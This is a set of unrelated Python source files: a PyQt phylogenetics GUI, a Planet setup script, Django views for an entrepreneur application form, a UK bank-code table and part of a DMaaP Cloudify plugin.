self.lStatisticStackedWidget.setCurrentIndex(1)
else:
moreInfo = "\"" + password + "\" is incorrect. please try again or contact <EMAIL>"
self.message("Incorrect Password", "The password you entered is incorrect.", moreInfo)
def keyPressEvent(self, e):
"""
Allows user to use enter/return key to submit password on password page.
"""
super(PhyloVisApp, self).keyPressEvent(e)
if e.key() in [QtCore.Qt.Key_Enter, QtCore.Qt.Key_Return]:
if (self.stackedWidget.currentIndex() == 5):
if (self.lStatisticStackedWidget.currentIndex() == 0):
self.login(self.lStatPasswordLineEdit.text())
def displayLStatistic(self, alignments_to_d, alignments_to_windows_to_d, v, r):
self.regularOutputLabel.setText(str(r))
self.verboseOutputLabel.setText(str(v))
if self.calcGenD.generatePlot:
for dd in alignments_to_windows_to_d:
d = alignments_to_windows_to_d[dd]
windows_to_lvals = {}
sigVec = []
for i in d:
windows_to_lvals[i] = (d[i])[0]
if d[i][1]:
sigVec.append(1)
else:
sigVec.append(0)
self.lStatisticWindow = lStatisticWindow.LStatisticWindow(windows_to_lvals, sigVec)
def displayDGEN2(self, r):
self.regularOutputLabel.setText(str(r))
#self.verboseOutputLabel.setText(str(v))
# if self.calcGenD.generatePlot:
# for dd in alignments_to_windows_to_d:
# d = alignments_to_windows_to_d[dd]
# windows_to_lvals = {}
# sigVec = []
# for i in d:
# windows_to_lvals[i] = (d[i])[0]
# if d[i][1]:
# sigVec.append(1)
# else:
# sigVec.append(0)
# self.lStatisticWindow = lStatisticWindow.LStatisticWindow(windows_to_lvals, sigVec)
#
#set progress bar to done
def displaySW(self, r):
self.showResultsSW.setText(str(r))
# **************************** MS PAGE ****************************#
additionalFileCounter = 0
additionalFileEntryNames = []
def runMSCompare(self):
try:
self.msComparison.msToRax = False
self.msComparison.msFiles = []
self.msComparison.msTruth = self.checkEntryPopulated(self.msFileEntry, errorTitle='Missing MS Truth File', errorMessage='Please select an MS Truth file.')
if self.checkboxCompareAgainstMS.isChecked():
self.msComparison.msFiles.append(self.msSecondFileEntry.text())
for i in range(len(self.additionalFileEntryNames)):
entry = self.findChild(QtGui.QLineEdit, self.additionalFileEntryNames[i])
self.msComparison.msFiles.append(self.checkEntryPopulated(entry, errorTitle='Blank Field', errorMessage='Field ' + str(i + 1) + ' is blank. Please select a file.'))
if self.checkboxCompareAgainstRaxml.isChecked():
self.msComparison.msToRax = True
self.msComparison.raxmlDir = self.checkEntryPopulated(self.msRaxmlDirectoryEntry)
self.msComparison.windowSize = int(self.checkEntryPopulated(self.msWindowSizeEntry))
self.msComparison.windowOffset = int(self.checkEntryPopulated(self.msWindowOffsetEntry))
self.msComparison.robinsonFouldsBarPlot = self.checkboxRobinsonFouldsBarPlot.isChecked()
self.msComparison.percentMatchingSitesBarPlot = self.checkboxPercentMatchingSitesGraph.isChecked()
self.msComparison.tmrcaLineGraph = self.checkboxTMRCAGraph.isChecked()
if not (self.checkboxCompareAgainstRaxml.isChecked() or self.checkboxCompareAgainstMS.isChecked()):
raise ValueError('Nothing to Compare Against', 'Please compare against a raxml directory and/or additional MS files.', 'n/a')
if not (self.checkboxRobinsonFouldsBarPlot.isChecked() or self.checkboxPercentMatchingSitesGraph.isChecked() or self.checkboxTMRCAGraph.isChecked()):
raise ValueError('No Plots Selected', 'Please select at least one plot.', 'n/a')
self.msComparison.start()
except ValueError, (ErrorTitle, ErrorMessage, ErrorDescription):
self.message(ErrorTitle, ErrorMessage, ErrorDescription)
return
def plotMSCompare(self, unweightedData, percentMatchingSitesUnweighted, sitesToNewickMsMaps, msFiles, msTruthLabel):
if self.msComparison.robinsonFouldsBarPlot:
self.msRobinsonFouldsWindow = msRobinsonFouldsWindow.MSRobinsonFouldsWindow('Robinson Foulds Distance From MS Truth', unweightedData, groupLabels1=msFiles)
if self.msComparison.percentMatchingSitesBarPlot:
msFilesWithValues = list(map(lambda (i, msFileName): msFileName + ":" + str('%.3f'%(percentMatchingSitesUnweighted[i])), enumerate(msFiles)))
self.msPercentMatchingWindow = msPercentMatchingWindow.MSPercentMatchingWindow('Percent of Matching Topologies', percentMatchingSitesUnweighted, groupLabels1=msFilesWithValues)
if self.msComparison.tmrcaLineGraph:
self.msTMRCAWindow = msTMRCAWindow.MSTMRCAWindow(sitesToNewickMsMaps, [msTruthLabel] + msFiles)
def addFileEntry(self, horizontalLayoutName, entryName, btnName, btn2Name):
self.additionalFileCounter += 1
self.additionalFileEntryNames.append(entryName + str(self.additionalFileCounter))
# create horizontal layout
HL = QtGui.QHBoxLayout()
HL.setObjectName(horizontalLayoutName + str(self.additionalFileCounter))
# create btn and add to horizontal layout
btn2 = QtGui.QToolButton(self.msMSCompareGroupBox)
btn2.setObjectName(btn2Name + str(self.additionalFileCounter))
btn2.setText('-')
btn2.setFixedHeight(21)
btn2.setFixedWidth(23)
HL.addWidget(btn2)
# create text entry and add to horizontal layout
entry = QtGui.QLineEdit(self.msMSCompareGroupBox)
entry.setReadOnly(True)
entry.setObjectName(entryName + str(self.additionalFileCounter))
HL.addWidget(entry)
# create btn and add to horizontal layout
btn = QtGui.QToolButton(self.msMSCompareGroupBox)
btn.setObjectName(btnName + str(self.additionalFileCounter))
btn.setText('...')
HL.addWidget(btn)
self.resize(self.width(), self.height() + 30)
self.msFileUploadMasterVL.addLayout(HL)
btn.clicked.connect(lambda: self.getFileName(entry))
btn2.clicked.connect(lambda: self.removeFileEntry(HL, entry, btn, btn2))
def removeFileEntry(self, HL, entry, btn, btn2):
HL.deleteLater()
entry.deleteLater()
btn.deleteLater()
btn2.deleteLater()
if entry.objectName() in self.additionalFileEntryNames:
self.additionalFileEntryNames.remove(entry.objectName())
if entry in self.additionalAlignmentEntries:
self.additionalAlignmentEntries.remove(entry)
# self.resize(self.width(), self.height() - 30)
# **************************** CONVERTER PAGE ****************************#
def convertFile(self):
try:
self.fileToBeConverted = self.checkEntryPopulated(self.fileConverterEntry, errorTitle='No Input File Selected', errorMessage='Please choose an input file.')
self.convertedFileDirectory = self.checkEntryPopulated(self.outputFileConverterEntry, errorTitle='No Output File Selected', errorMessage='Please choose an output file.')
except ValueError, (ErrorTitle, ErrorMessage, ErrorDescription):
self.message(ErrorTitle, ErrorMessage, ErrorDescription)
return
self.convertedFileName = self.convertedFileDirectory + '/convertedFile.' + self.outputFormatComboBox.currentText().lower() + '.txt'
self.fileConverter.inputFileName = self.fileToBeConverted
self.fileConverter.outputFileName = self.convertedFileName
self.fileConverter.inputFormat = self.inputFormatComboBox.currentText().lower()
self.fileConverter.outputFormat = self.outputFormatComboBox.currentText().lower()
self.fileConverter.start()
# **************************** RAXML PAGE ****************************#
def generateSpeciesTree(self):
try:
# get values from gui -- ensure that no fields are blank
self.raxmlOperations.inputFilename = self.checkEntryPopulated(self.inputFileEntry, errorTitle='Missing Alignment', errorMessage='Please select an alignment.')
self.raxmlOperations.windowSize = self.checkEntryInRange(self.windowSizeEntry, min=0, inclusive=False, errorTitle='Invalid Window Size', errorMessage='Window size needs to be a positive integer.')
self.raxmlOperations.windowOffset = self.checkEntryInRange(self.windowOffsetEntry, min=0, inclusive=False, errorTitle='Invalid Window Offset', errorMessage='Window offset needs to be a positive integer.')
self.raxmlOperations.speciesTreeRooted = self.checkboxSpeciesTreeRooted.isChecked()
self.raxmlOperations.speciesTreeOutGroup = self.speciesTreeComboBox.currentText()
self.raxmlOperations.speciesTreeUseCustomRax = self.checkboxSpeciesTreeUseCustomRax.isChecked()
# if using custom rax -- make sure that the user doesn't use the -s or -n flags
self.raxmlOperations.speciesTreeCustomRaxmlCommand = ''
if self.checkboxSpeciesTreeUseCustomRax.isChecked():
self.raxmlOperations.speciesTreeCustomRaxmlCommand = self.checkEntryPopulated(self.speciesTreeRaxmlCommandEntry, errorTitle='No RAxML Command', errorMessage='Please enter a custom raxml command or uncheck the box.')
if re.search('([\-][n])|([\-][s])', self.speciesTreeRaxmlCommandEntry.text()):
raise ValueError('Invalid RAxML Command', 'Please do not specify the -s or -n flags.', 'the -s and -n flags will be handled internally based on the alignment you input.')
except ValueError, (ErrorTitle, ErrorMessage, ErrorDescription):
self.message(str(ErrorTitle), str(ErrorMessage), str(ErrorDescription))
return
self.raxmlOperations.raxml_species_tree(self.raxmlOperations.inputFilename, rooted=self.raxmlOperations.speciesTreeRooted, outgroup=self.raxmlOperations.speciesTreeOutGroup, customRax=self.raxmlOperations.speciesTreeUseCustomRax, customRaxCommand=self.raxmlOperations.speciesTreeCustomRaxmlCommand)
def requestedFigures(self):
requestedFigures = set()
if self.checkboxAllTrees.isChecked():
requestedFigures.add('Top Topologies Tree Visualization')
if self.checkboxScatterPlot.isChecked():
requestedFigures.add('Windows to Top Topologies Scatter Plot')
if self.checkboxDonutPlot.isChecked():
requestedFigures.add('Top Topology Frequency Donut Plot')
if self.checkboxWindowsToInfSites.isChecked():
requestedFigures.add('Windows to Informative Sites Line Graph')
if self.checkboxHeatMap.isChecked():
requestedFigures.add('Informative Sites Heat Map')
if self.checkboxRobinsonFoulds.isChecked():
requestedFigures.add('Robinson Foulds')
if self.checkboxPGTST.isChecked():
requestedFigures.add('p(GT | ST))')
return requestedFigures
def generateHeatmap(self):
self.updatedDisplayWindows()
def generateFigures(self):
if self.runComplete:
if self.raxmlInputErrorHandling():
self.figuresToBeRegenerated = self.prevGeneratedFigures.intersection(self.requestedFigures())
if len(self.figuresToBeRegenerated) > 0:
# execute window
regen = self.question("Regenerate Figures?", "You have selected figures which have previously been generated. All selected figures will be generated. Are you sure you want to proceed?")
# if the user selected the 'ok' button
if regen == QtGui.QMessageBox.Yes:
# start raxml operations thread
self.updatedDisplayWindows()
# if raxml hasn't been run before just run it
else:
self.updatedDisplayWindows()
def updatedDisplayWindows(self):
# run commands that are shared by all functions
if self.getNumberChecked() > 0:
num = self.topTopologies
topologies_to_counts, unique_topologies_to_newicks = self.topologyPlotter.topology_counter(rooted=self.rooted, outgroup=self.outgroupComboBox.currentText())
self.numberOfUniqueTopologiesLabel.setText(str(len(topologies_to_counts)))
if num > len(topologies_to_counts):
num = len(topologies_to_counts)
self.topologyPlotter.num = num
list_of_top_counts, labels, sizes = self.topologyPlotter.top_freqs(num, topologies_to_counts)
top_topologies_to_counts = self.topologyPlotter.top_topologies(num, topologies_to_counts)
windows_to_top_topologies, top_topologies_list = self.topologyPlotter.windows_to_newick(top_topologies_to_counts, unique_topologies_to_newicks, rooted=self.rooted, outgroup=self.outgroupComboBox.currentText()) # all trees, scatter, circle, donut
topologies_to_colors, scatter_colors, ylist = self.topologyPlotter.topology_colors(windows_to_top_topologies, top_topologies_list) # scatter, circle, (donut?)
# generate robinson foulds and pgtst graphs
if self.checkboxRobinsonFoulds.isChecked():
self.prevGeneratedFigures.add('<NAME>')
if self.checkboxWeighted.isChecked():
windows_to_w_rf, windows_to_uw_rf = self.statisticsCalculations.calculate_windows_to_rf(self.speciesTree, self.checkboxWeighted.isChecked())
self.robinsonFouldsWindow = robinsonFouldsWindow.RobinsonFouldsWindow('Weighted Robinson Foulds Distance', windows_to_w_rf, 'Unweighted Robinson Foulds Distance', windows_to_uw_rf)
else:
windows_to_uw_rf = self.statisticsCalculations.calculate_windows_to_rf(self.speciesTree, self.checkboxWeighted.isChecked())
self.robinsonFouldsWindow = robinsonFouldsWindow.RobinsonFouldsWindow('Unweighted Robinson Foulds Distance', windows_to_uw_rf)
if self.checkboxPGTST.isChecked():
self.prevGeneratedFigures.add('p(GT | ST)')
windowsToPGTST = self.statisticsCalculations.calculate_windows_to_p_gtst(self.speciesTree)
self.pgtstWindow = pgtstWindow.PGTSTWindow(windowsToPGTST, "p(gt|st)", xLabel="Windows", yLabel="Probability")
# generate donut plot
if self.checkboxDonutPlot.isChecked():
self.prevGeneratedFigures.add('Top Topology Frequency Donut Plot')
donut_colors = self.topologyPlotter.donut_colors(top_topologies_to_counts, topologies_to_colors) # donut
self.donutPlotWindow = donutPlotWindow.DonutPlotWindow('Frequency of Top Topologies', labels, sizes, donut_colors)
# generate scatter plot
if self.checkboxScatterPlot.isChecked():
self.prevGeneratedFigures.add('Windows to Top Topologies Scatter Plot')
self.scatterPlotWindow = scatterPlotWindow.ScatterPlotWindow('Windows to Top Topologies', windows_to_top_topologies, scatter_colors, ylist)
# generate informative sites heatmap graph
if self.checkboxHeatMap.isChecked():
self.prevGeneratedFigures.add('Informative Sites Heat Map')
sites_to_informative, windows_to_informative_count, windows_to_informative_pct, pct_informative = self.informativeSites.calculate_informativeness('windows', 0, self.heatmapPercentage.text(),alignment=self.inputFileEntry.text())
self.heatMapWindow = heatMapWindow.HeatMapWindow('Heat Map', sites_to_informative)
# generate windows to informative sites line graph
if self.checkboxWindowsToInfSites.isChecked():
self.prevGeneratedFigures.add('Windows to Informative Sites Line Graph')
sites_to_informative, windows_to_informative_count, windows_to_informative_pct, pct_informative = self.informativeSites.calculate_informativeness('windows', self.raxmlOperations.windowOffset)
self.windowsToInfSitesWindow = windowsToInfSitesWindow.WindowsToInfSitesWindow('Windows to Informative Sites', windows_to_informative_pct)
# generate bootstrap graph
if self.checkboxBootstrap.isChecked():
internal_nodes_i, internal_nodes_f = self.bootstrapContraction.internal_nodes_after_contraction(self.confidenceLevel)
self.bootstrapContractionWindow = bootstrapContractionWindow.BootstrapContractionWindow(internal_nodes_i, internal_nodes_f, self.confidenceLevel, xLabel="Window Indices", yLabel="Number of Internal Nodes")
# generate all trees graph
if self.checkboxAllTrees.isChecked():
self.prevGeneratedFigures.add('Top Topologies Tree Visualization')
self.allTreesWindow = allTreesWindow.AllTreesWindow('', topologies_to_colors, topologies_to_counts, rooted=self.checkboxRooted.isChecked(), outGroup=self.outgroupComboBox.currentText())
def raxmlInputErrorHandling(self):
"""
returns true if all tests pass otherwise false
"""
try:
# input alignment for raxml
self.raxmlOperations.inputFilename = self.checkEntryPopulated(self.inputFileEntry, errorTitle='Missing Alignment', errorMessage='Please select an alignment.')
self.raxmlOperations.windowSize = self.checkEntryInRange(self.windowSizeEntry, min=0, inclusive=False, errorTitle='Invalid Window Size', errorMessage='Window size needs to be a positive integer.')
self.raxmlOperations.windowOffset = self.checkEntryInRange(self.windowOffsetEntry, min=0, inclusive=False, errorTitle='Invalid Window Offset', errorMessage='Window offset needs to be a positive integer.')
self.raxmlOperations.outGroup = self.outgroupComboBox.currentText()
self.raxmlOperations.model = self.modelComboBox.currentText()
self.raxmlOperations.isCustomRaxmlCommand = self.checkBoxCustomRaxml.isChecked()
self.raxmlOperations.bootstrap = self.checkboxBootstrap.isChecked()
self.raxmlOperations.rooted = self.checkboxRooted.isChecked()
self.rooted = self.checkboxRooted.isChecked()
# if user is generating Top Topologies or scatter plot or donut plor or circle graph run error handling on top topologies entry
if self.checkboxAllTrees.isChecked() or self.checkboxScatterPlot.isChecked() or self.checkboxDonutPlot.isChecked():
self.checkEntryPopulated(self.numberOfTopTopologiesEntry, errorTitle='Number of Top Topologies Field is Blank', errorMessage='Please enter a number of top topologies.')
self.topTopologies = self.checkEntryInRange(self.numberOfTopTopologiesEntry, min=0, max=16, inclusive=False, errorTitle='Invalid Number of Top Topologies', errorMessage='Please enter an integer between 0 and 15.')
# bootstrap error handling
self.raxmlOperations.numBootstraps = 0
if self.checkboxBootstrap.isChecked():
self.confidenceLevel = self.checkEntryInRange(self.confidenceLevelEntry, min=0, max=100, errorTitle='Invalid Confidence Level', errorMessage='Please enter an integer between 0 and 100.')
self.raxmlOperations.numBootstraps = self.checkEntryInRange(self.numberOfBootstrapsEntry, min=2, errorTitle='Invalid Number of Bootstraps', errorMessage='Please enter an integer greater than 1.')
# if using custom rax -- make sure that the user doesn't use the -s or -n flags
if self.checkBoxCustomRaxml.isChecked():
self.raxmlOperations.customRaxmlCommand = self.checkEntryPopulated(self.customRaxmlCommandEntry, errorTitle='No RAxML Command', errorMessage='Please enter a custom raxml command or uncheck the box.')
if re.search('([\-][n])|([\-][s])', self.customRaxmlCommandEntry.text()):
raise ValueError, ('Invalid RAxML Command', 'Please do not specify the -s or -n flags.', 'the -s and -n flags will be handled internally based on the alignment you input.')
# species tree error handling
if self.speciesTreeEntry.text() != "" and self.newickFileEntry.text() != "":
raise ValueError, ('Multiple Species Trees', 'You have both selected a species tree file and entered a species tree. Please only do one.', 'Both the "Species Tree File and "Enter Species Tree" fields are populated. Please only use one.')
# if the user selects either statistic plot -- open the inputted newick and read it into memory as a string on a single line
if self.checkboxRobinsonFoulds.isChecked() or self.checkboxPGTST.isChecked():
if self.newickFileEntry.text() != "":
self.newickFileName = self.checkEntryPopulated(self.newickFileEntry, errorTitle='Missing Species Tree', errorMessage='Please select a species tree.', errorDescription='Please select a species tree.')
with open(self.newickFileEntry.text(), 'r') as f:
self.speciesTree = f.read().replace('\n', '')
else:
self.speciesTree = self.checkEntryPopulated(self.speciesTreeEntry, errorTitle='Missing Species Tree', errorMessage='Please select a species tree.', errorDescription='Please select a species tree.')
except ValueError, (ErrorTitle, ErrorMessage, ErrorDescription):
self.message(str(ErrorTitle), str(ErrorMessage), str(ErrorDescription))
return False
return True
def runRAxML(self):
# if all error handling passes run RAxML
if self.raxmlInputErrorHandling():
# if rax has been run previously, ask the user to confirm that they want to rerun
if self.runComplete:
rerunRax = self.question("Rerun RAxML?", "Are you sure you want to rerun RAxML?")
# if the user selected the 'ok' button
if rerunRax == QtGui.QMessageBox.Yes:
# start raxml operations thread
self.raxmlOperations.start()
# if raxml hasn't been run before just run it
else:
# start raxml operations thread
self.raxmlOperations.start()
def raxmlComplete(self):
topologies_to_counts, unique_topologies_to_newicks = self.topologyPlotter.topology_counter(rooted=self.rooted, outgroup=self.outgroupComboBox.currentText())
self.numberOfUniqueTopologiesLabel.setText(str(len(topologies_to_counts)))
self.runBtn.setText("Rerun RAxML")
self.generateFiguresWrapper.setToolTip("")
self.generateFiguresWrapper.setEnabled(True)
self.progressBar.setValue(100)
self.runComplete = True
# **************************** ABSTRACT ****************************#
def message(self, title, description, extraInfo, type='Err'):
"""
creates and displays and window displaying the message
"""
# create object
errMessage = QtGui.QMessageBox()
# set text
errMessage.setText(title)
errMessage.setInformativeText(description)
errMessage.setDetailedText(extraInfo)
# default pixmap for error
pixmap = QtGui.QPixmap('imgs/warning.png')
# set icon
errMessage.setIconPixmap(pixmap)
# execute window
errMessage.exec_()
def question(self, title, description, type='Question'):
"""
creates and displays and window displaying the message
"""
# create object
qMessage = QtGui.QMessageBox()
# set text
qMessage.setText(title)
qMessage.setInformativeText(description)
# default pixmap for error
pixmap = QtGui.QPixmap('imgs/warning.png')
# set icon
qMessage.setIconPixmap(pixmap)
qMessage.setStandardButtons(QtGui.QMessageBox.Yes | QtGui.QMessageBox.Cancel)
# execute window
return qMessage.exec_()
def checkEntryPopulated(self, entry, errorTitle='Field Not Populated', errorMessage='Please populate field.', errorDescription=None):
"""
checks if given entry is empty or not.
(i) if entry is populated returns text
(ii) otherwise raises value error
"""
# if user does not provide an error description generate one automatically
if not errorDescription:
errorDescription = 'relevant entry name: ' + str(entry.objectName())
text = str(entry.text())
if text == '':
raise ValueError(errorTitle, errorMessage, errorDescription)
return text
def checkEntryInRange(self, entry, min=(-1.0 * float('inf')), max=float('inf'), inclusive=True, errorTitle='Entry Out Of Range', errorMessage='', errorDescription=None):
"""
checks if value of given entry is in range.
i. if entry is in given range return it
ii. otherwise raises value error
"""
# if user does not provide an error description generate one automatically
if not errorDescription:
errorDescription = 'relevant entry name: ' + str(entry.objectName())
# check to make sure the entry is populated
if entry.text() != '':
val = float(int(float(entry.text())))
else:
raise ValueError, (errorTitle, errorMessage, errorDescription)
# check to make sure value is in range
if inclusive:
if val < min or val > max:
raise ValueError, (errorTitle, errorMessage, errorDescription)
else:
if val <= min or val >= max:
raise ValueError, (errorTitle, errorMessage, errorDescription)
return int(val)
def updateTaxonComboBoxes(self, comboBoxes, textEntry, require4Taxons=False):
"""
input:
i. comboBoxes - a list of comboBox widgets (drop down menus)
ii. textEntry - a text entry widget
iii. errHandling=False - a boolean indicating whether or not to require that there be exactly four taxons in the file in the text entry
gets a list of taxons from the file in textEntry and sets the items in a list of combo boxes to that list of taxons.
"""
try:
if textEntry.text() == "":
return
# get list of taxon names from file
taxonNames = list(self.raxmlOperations.taxon_names_getter(textEntry.text()))
if require4Taxons:
# if there are not exactly 4 taxons
if len(taxonNames) != 4:
self.message('Warning.', 'The D Statistic is meant to be run on a 4 taxa alignment.', textEntry.text())
# clear each combo box
for comboBox in comboBoxes:
comboBox.clear()
# add the list of taxons to each combobox
for taxon in taxonNames:
for comboBox in comboBoxes:
comboBox.addItem(taxon)
for i in range(len(comboBoxes)):
comboBoxes[i].setCurrentIndex(i)
except:
self.message('Invalid File', 'Invalid alignment file. Please choose another.', 'Make sure your file has 4 sequences and is in the phylip-relaxed format.', type='Err')
return
def getNumberChecked(self):
"""
returns the number of checkboxes that are checked
"""
return (self.checkboxScatterPlot.checkState() + self.checkboxDonutPlot.checkState() + self.checkboxAllTrees.checkState()) / 2
def toggleEnabled(self, guiElement):
"""
toggles whether or not guiElement is enabled
"""
enabled = guiElement.isEnabled()
guiElement.setEnabled(not enabled)
def setWindow(self, window):
self.stackedWidget.setCurrentIndex(self.windows[window])
self.resize(self.windowSizes[window]['x'], self.windowSizes[window]['y'])
self.move(self.windowLocations[window]['x'], self.windowLocations[window]['y'])
def ensureSingleModeSelected(self, mode_selected, window):
for mode in self.menuMode.actions():
if mode != mode_selected:
mode.setChecked(False)
mode_selected.setChecked(True)
self.setWindow(window)
def saveFileAs(self, textEntry):
"""
i. open a dialog to get in which user enters a file name to save
ii. sets the text of given text entry to match file user selected
"""
textEntry.setText(QtGui.QFileDialog.getSaveFileName(self, 'Export'))
def getFileName(self, textEntry):
"""
i. open a dialog to get in which user selects a file
ii. sets the text of given text entry to match file user selected
"""
textEntry.setText(QtGui.QFileDialog.getOpenFileName())
textEntry.emit(QtCore.SIGNAL('FILE_SELECTED'))
def openDirectory(self, textEntry):
"""
i. open a dialog in which user selects a directory
ii. sets the text of given text entry to match the directory the user selected
"""
textEntry.setText(QtGui.QFileDialog.getExistingDirectory())
textEntry.emit(QtCore.SIGNAL("DIRECTORY_SELECTED"))
def openWindow(self, window, type='std'):
window.show()
if type == 'std':
window.plot()
elif type == 'tabs':
window.displayImages()
def openURL(self, url):
webbrowser.open(url, new=0, autoraise=True)
def setValidator(self, entry, validator):
if validator == 'Double':
entry.setValidator(QtGui.QDoubleValidator(entry))
elif validator == 'Int':
entry.setValidator(QtGui.QIntValidator(entry))
# def resizeEvent(self, event):
# print self.size()
# def moveEvent(self, QMoveEvent):
# print self.pos()
if __name__ == '__main__': # if we're running file directly and not importing it
app = QtGui.QApplication(sys.argv) # A new instance of QApplication
# initialize main input window
form = PhyloVisApp() # We set the form to be our PhyloVisApp (design)
form.show() # Show the form
form.move(600, 300)
sys.exit(app.exec_()) # and execute the app
|
StarcoderdataPython
|
3459738
|
import FuncoesDados
# Terceira parte para exportar o resultado
microdados = FuncoesDados.MicrodadosENEM("MicrodadosFiltradosComQuest.csv", colunas=None)
microdados.exportar_resultado()
# microdados.mostrar_resultado()
# Opicional
print("Concluído.")
|
StarcoderdataPython
|
396825
|
<gh_stars>0
#!/usr/bin/env python
"""The Planet aggregator."""
__authors__ = [ "<NAME> <<EMAIL>>",
"<NAME> <<EMAIL>>" ]
__license__ = "Python"
from distutils.core import setup
from planet import __version__ as planet_ver
setup(name="planet",
version=planet_ver,
packages=["planet", "planet.compat_logging"],
scripts=["planet.py", "planet-cache.py"],
description="The Planet aggregator",
url="http://www.planetplanet.org/",
author="<NAME> and <NAME>",
author_email="<EMAIL>",
)
|
StarcoderdataPython
|
6455209
|
from django.contrib.auth import get_user_model
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.urls import reverse, reverse_lazy
from django.utils.translation import gettext_lazy as _
from django.views.generic import DetailView, RedirectView, UpdateView, ListView
from django.views.generic.edit import CreateView
from diri.users.models import Entrepreneurs
from diri.users.forms import BioForm
from formtools.wizard.views import SessionWizardView
from django.contrib import messages
from django.shortcuts import redirect, render
from django.core.files.storage import DefaultStorage, FileSystemStorage
from django.http import HttpResponseRedirect, HttpResponse
import os
from config import settings
from django.core.mail import send_mail
User = get_user_model()
class UserDetailView(LoginRequiredMixin, DetailView):
model = User
slug_field = "username"
slug_url_kwarg = "username"
user_detail_view = UserDetailView.as_view()
class UserUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = User
fields = ["name"]
success_message = _("Information successfully updated")
def get_success_url(self):
return self.request.user.get_absolute_url() # type: ignore [union-attr]
def get_object(self):
return self.request.user
user_update_view = UserUpdateView.as_view()
class UserRedirectView(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
return reverse("users:detail", kwargs={"username": self.request.user.username})
user_redirect_view = UserRedirectView.as_view()
class ApplyNow(SuccessMessageMixin, CreateView):
template_name = "pages/home.html"
model = Entrepreneurs
form_class = BioForm
success_message = _("Your application has been submitted successfully")
success_url = reverse_lazy("home")
def form_valid(self, form):
entrepreneurs = form.save(commit=False)
msg = """Name: {name}\nState: {state}\nLGA: {lga}\nBank: {bank}\nAccount: {acc_no}\nBVN: {bvn}\nEmail: {email}\nPhone: {phone}""".format(
name=entrepreneurs.first_name + " " + entrepreneurs.mid_name + " " + entrepreneurs.last_name,
state=entrepreneurs.state,
lga=entrepreneurs.lga,
bank=entrepreneurs.bank_name,
acc_no=entrepreneurs.acc_no,
bvn=entrepreneurs.bvn,
email=entrepreneurs.email,
phone=entrepreneurs.phone,
)
send_mail(
"NEW ENTREPRENEUR REGISTERED",
msg,
"<EMAIL>",
["<EMAIL>", "<EMAIL>"],
fail_silently=False,
)
return super(ApplyNow, self).form_valid(form)
apply_now = ApplyNow.as_view()
# FORMS = [
# ("bio", BioForm),
# ("statement", StatementForm),
# ("validate", ValidateForm)
# ]
# class ApplyNow(SessionWizardView):
# # model = Entrepreneurs
# template_name = "pages/home.html"
# form_list = [BioForm, StatementForm, ValidateForm]
# file_storage = DefaultStorage()
# # def get_form_initial(self, step):
# # if "entrepreneurs_id" in self.kwargs:
# # return {}
# # initial = self.initial_dict.get(step, {})
# # return initial
# # def get_form_instance(self, step):
# # if "entrepreneurs_id" in self.kwargs and step == 0:
# # entrepreneurs_id = self.kwargs['entrepreneurs_id']
# # return Entrepreneurs.objects.get(pk=entrepreneurs_id)
# # elif "entrepreneurs_id" in self.kwargs and step == 1:
# # entrepreneurs_id = self.kwargs['entrepreneurs_id']
# # return Entrepreneurs.objects.get(pk=entrepreneurs_id)
# # return self.instance_dict.get(step, None)
# # def get(self, request, *args, **kwargs):
# # try:
# # return self.render(self.get_form())
# # except KeyError:
# # return super().get(request, *args, **kwargs)
# def done(self, form_list, *args, **kwargs):
# for form in form_list:
# form_data = form.cleaned_data
# entrepreneurs = Entrepreneurs.objects.create(**form_data)
# print(entrepreneurs)
# msg = """Name: {name}\nState: {state}\nLGA: {lga}\nBank: {bank}\nAccount: {acc_no}\nBVN: {bvn}\nEmail: {email}\nPhone: {phone}""".format(name=entrepreneurs.__str__, state=entrepreneurs.state, lga=entrepreneurs.lga, bank=entrepreneurs.bank_name, acc_no=entrepreneurs.acc_no, bvn=entrepreneurs.bvn, email=entrepreneurs.email, phone=entrepreneurs.phone)
# send_mail("NEW ENTREPRENEUR REGISTERED", msg, "<EMAIL>", ["<EMAIL>", "<EMAIL>"], fail_silently=False)
# messages.success(
# self.request, "Your application has been submitted successfully"
# )
# return HttpResponseRedirect('/')
# apply_now = ApplyNow.as_view(FORMS)
|
StarcoderdataPython
|
9771678
|
<reponame>UKHomeOffice/PythonFakerExtensions
financial_institutions = {
"Barclays": {"bank_code": "BARC"},
"Bank of Scotland": {"bank_code": "BOFS"},
"Halifax": {"bank_code": "HLFX"},
"HSBC": {"bank_code": "MIDL"},
"Natwest": {"bank_code": "NWBK"},
"Nationwide": {"bank_code": "NAIA"},
"Royal Bank of Scotland": {"bank_code": "RBOS"},
"Santander": {"bank_code": "ABBY"},
"Starling Bank": {"bank_code": "SRLG"},
"thinkmoney": {"bank_code": "RBOS"},
"TSB": {"bank_code": "TSBS"},
"Virgin Money": {"bank_code": "NRNB"}
}
|
StarcoderdataPython
|
6644058
|
# ============LICENSE_START====================================================
# org.onap.dcaegen2
# =============================================================================
# Copyright (c) 2017-2020 AT&T Intellectual Property. All rights reserved.
# Copyright (c) 2020 Pantheon.tech. All rights reserved.
# =============================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============LICENSE_END======================================================
from cloudify import ctx
from cloudify.decorators import operation
from cloudify.exceptions import NonRecoverableError
from dmaapplugin import DMAAP_API_URL, DMAAP_USER, DMAAP_PASS
from dmaapplugin.dmaaputils import random_string
from dmaapcontrollerif.dmaap_requests import DMaaPControllerHandle
# Set up a subscriber to a source feed
def _set_up_subscriber(dmc, source_feed_id, loc, delivery_url, username, userpw):
# Add subscriber to source feed
add_sub = dmc.add_subscriber(source_feed_id, loc, delivery_url, username, userpw)
add_sub.raise_for_status()
return add_sub.json()
# Set up a publisher to a target feed
def _set_up_publisher(dmc, target_feed_id, loc):
username = random_string(8)
userpw = random_string(16)
add_pub = dmc.add_publisher(target_feed_id, loc, username, userpw)
add_pub.raise_for_status()
pub_info = add_pub.json()
return pub_info["pubId"], username, userpw
# Get a central location to use when creating a publisher or subscriber
def _get_central_location(dmc):
locations = dmc.get_dcae_central_locations()
if len(locations) < 1:
